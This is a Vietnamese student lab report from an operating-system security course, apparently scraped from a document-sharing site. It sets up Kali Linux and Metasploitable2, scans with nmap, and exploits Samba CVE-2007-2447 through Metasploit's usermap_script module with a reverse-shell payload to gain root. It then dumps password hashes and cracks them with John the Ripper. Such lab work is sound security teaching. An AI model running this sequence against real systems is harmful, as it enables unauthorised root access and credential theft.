1. Trang chủ
  2. » Luận Văn - Báo Cáo

An toàn hệ Điều hành bài thực hành 1

26 0 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề An an toàn hệ điều hành bài thực hành 1
Tác giả Nguyễn Xuân Bắc
Người hướng dẫn Hoàng Xuân Dậu
Trường học Học viện Công nghệ Bưu chính Viễn thông
Chuyên ngành An toàn hệ điều hành
Thể loại Bài thực hành
Năm xuất bản 2024
Thành phố Hà Nội
Định dạng
Số trang 26
Dung lượng 8,74 MB

Nội dung

- etasploitable2 là một máy ảo VMWare được tích hợp nhiều dịch vụ chứa các lỗi bảo mật đã biết cho phép khai thác kiểm soát hệ thống từ xa phục vụ học tập.. Danh sách các lỗ hổng và hướn

Trang 1

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG

KHOA AN TOÀN THÔNG TIN

Môn: An toàn hệ điều hành

Bài thực hành 1

Họ và tên sinh viên: Nguyễn Xuân Bắc

Mã số sinh viên: B21DCAT040

Họ và tên giảng viên: Hoàng Xuân Dậu

Hà Nội 3/2024 (tháng/năm)

Trang 2

Table of Contents

I Mục đích 1

II Lý thuyết 1

A Công cụ Metasploit 1

1 Giới thiệu 1

2 Thành phần 1

B Dịch vụ samba 1

1 Giới thiệu: 1

2 Tính năng chính: 1

3 Lợi ích: 2

4 Ứng dụng: 2

III Thực hành 2

A Chuẩn bị 2

1 Cài đặt máy ảo Kali Linux 2

2 Tải và cài Metasploitable 13

3 Tạo một người dùng mới trên máy ảo: 15

o Tạo mới người dùng cho mình: sudo useradd bacnx040 , trong đó ghép tên không dấu + chữ cái đầu của họ đệm và 3 số mã sinh viên 15

o Tạo mật khẩu cho người dùng: sudo passwd bacnx040 , nhập mật khẩu mới 2 lần (lưu ý đặt mật khẩu đơn giản và ngắn để có thể crack được) 15

4 Đặt lại tên máy chứa lỗi là Mã SV+Họ và tên → tên máy là B21DCAT040-Bac-Meta Khởi động lại máy victim để máy nhận tên mới 15

B 16

1 Quét máy victim Metasploitable2 tìm các lỗ hổng tồn tại 16

2 Khai thác lỗi trên Samba cho phép mở shell chạy với quyền root 20

2

Trang 3

2 Thành phần

- Metasploit có hai giao diện người dùng: Console và Web interface

- Môi trường trong Metasploit được chia thành hai loại: Global Enviroment và Temporary Enviroment

+ Global Enviroment được sử dụng để cấu hình các tùy chọn chung cho tất cả các module khai thác

+ Temporary Enviroment được sử dụng để cấu hình các tùy chọn cho module khai thác đang được sử dụng

B Dịch vụ samba

1 Giới thiệu:

- Samba là một phần mềm mã nguồn mở cho phép chia sẻ tài nguyên (file, máy

in, ) giữa các máy tính trong mạng Samba hoạt động dựa trên giao thức SMB/CIFS (Server Message Block/Common Internet File System) được Microsoftphát triển

2 Tính năng chính:

- Chia sẻ file và máy in giữa các máy tính Windows, Linux và macOS

- Xác thực người dùng và quản lý quyền truy cập

- Hỗ trợ nhiều giao thức mạng như SMB/CIFS, NetBIOS, WINS, LDAP

- Dễ dàng cài đặt và cấu hình

Trang 4

- Hỗ trợ nhiều tính năng nâng cao như: o Replication: Sao chép dữ liệu giữa các máy chủ Samba o Failover: Chuyển đổi dự phòng giữa các máy chủ Samba o Clustering: Tạo cụm máy chủ Samba để tăng hiệu suất và khả năng sẵn sàng

3 Lợi ích:

- Tăng khả năng tương thích giữa các hệ điều hành khác nhau

- Cung cấp giải pháp chia sẻ tài nguyên hiệu quả và an toàn

- Giảm chi phí quản lý mạng

- etasploitable2 là một máy ảo VMWare được tích hợp nhiều dịch vụ chứa các lỗi bảo mật đã biết cho phép khai thác kiểm soát hệ thống từ xa phục vụ học tập Danh sách các lỗ hổng và hướng dẫn khai thác có thể tìm tại:

https://www.hackingarticles.in/comprehensive-guide-on-metasploitable- 2/ o Lỗ hổng là lỗ hổng bảo mật CVE-2007-2447 trên dịch vụ chia sẻ file SMB (Samba) với các phiên bản Samba 3.0.0 đến 3.0.25rc3 có thể cho phép thực thi mã từ xa Chi tiết về lỗ hổng này có thể tìm tại: https://nvd.nist.gov/vuln/detail/CVE- 2007-2447

III Thực hành

A Chuẩn bị

- Cài đặt Kali Linux (nếu chưa cài đặt) trên 1 máy ảo (hoặc máy thực)

1 Cài đặt máy ảo Kali Linux

o Ta nạp file ISO của Kali Linux vào VMware

2

Trang 5

Ta chọn phiên bản Linux

Trang 6

o Ta đặt tên cho máy ảo và chọn vị trí tệp lưu

o Ta chọn finish để hoàn hành việc tạo máy ảo

4

Trang 7

o Ta chọn Install

o Chọn ngôn ngữ phù hợp

Trang 8

o Chọn quốc gia hoặc khu vực

6

Trang 9

o Ta để tên máy Kali Linux thành dạng Mã SV-Tên-Kali Bắc-Kali).

Trang 10

(B21DCAT040-o Ta tạo tài khoản người dùng

8

Trang 14

o Ta đợi download hoàn tất và tiến hành đăng nhập

12

Trang 15

o Kết quả thu được là ta đã cài đặt thành công máy ảo Kali-Linux

2 Tải và cài Metasploitable

o Ta tải Metasploitable và giải nén ra Ta thu được thư mục chứa file cài đặt

Trang 16

Ta mở file cài đặt(đuôi vmdk) bằng phần mềm VMware

o Ta đăng nhập vào bằng tài khoản đăng nhập vào hệ thống là msfadmin / msfadmin

14

Trang 17

3 Tạo một người dùng mới trên máy ảo:

o Tạo mới người dùng cho mình: sudo useradd bacnx040 , trong đó ghép tên không dấu + chữ cái đầu của họ đệm và 3 số mã sinh viên

o Tạo mật khẩu cho người dùng: sudo passwd bacnx040 , nhập mật khẩu mới 2 lần (lưu ý đặt mật khẩu đơn giản và ngắn để có thể crack được)

4 Đặt lại tên máy chứa lỗi là Mã SV+Họ và tên → tên máy là B21DCAT040-Bac-Meta Khởi động lại máy victim để máy nhận tên mới

Trang 18

1 Quét máy victim Metasploitable2 tìm các lỗ hổng tồn tại

o Ta kiểm tra ip của máy Kali

o Kiểm tra ip của máy Meta

16

Trang 19

Ta ping thử từ máy Meta sang máy Kali

o Ta ping từ máy Kali sang Meta

- Sử dụng công cụ nmap để rà quét các lỗ hổng tồn tại trên máy chạy

Metasploitable2:

Trang 20

o Quét cổng dịch vụ netbios-ssn cổng 139: nmap script vuln -p139 192.168.232.148

o Quét cổng dịch vụ microsoft-ds cổng 445: nmap script vuln -p445 192.168.232.148

18

Trang 21

o Khởi động Metasploit

o Khai báo sử dụng mô đun tấn công:

msf > use auxiliary/scanner/smb/smb_version

Trang 22

o Đặt địa chỉ IP máy victim: msf > set RHOST <ip_victim> và thực thi tấn công: msf > exploit

- Kết quả ta thu được phiên bản của Samba là Unix(Samba 3.0.20-Debian)

2 Khai thác lỗi trên Samba cho phép mở shell chạy với quyền root

o Khai báo sử dụng mô đun tấn công: msf >

use exploit/multi/samba/usermap_script

20

Trang 23

- Đặt địa chỉ IP máy victim: msf > set RHOST 192.168.232.148

- Chọn payload cho thực thi (mở shell): msf > set payload cmd/unix/reverse

- Đặt 445 là cổng truy cập máy victim: msf > set RPORT 445

Trang 24

- Thực thi tấn công: msf > exploit

- Ta có thể thực hiện bất cứ lệnh shell nào trên máy victim

- Chạy các lệnh để đọc tên người dùng và máy đang truy cập:

Trang 25

- Kết quả ta thu được tên người dùng và mật khẩu băm :

- Ta chạy thử lệnh: john show password

- Kết quả là chưa có mật khẩu nào bị bẻ khóa

Trang 26

- Ta dùng lệnh: Join password –wordlist=“password” để tìm phương thức mã hóa tài khoản và mật khẩu

 Kết quả ta thu được là thuật toán mã hóa md5

- Ta dùng lệnh: Join –format=md5crypt-long password để lấy tài khoản và mật khẩu

 Ta đã thu được tài khoản là bacnx040 và mật khẩu là 1

24

Ngày đăng: 14/02/2025, 15:35

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN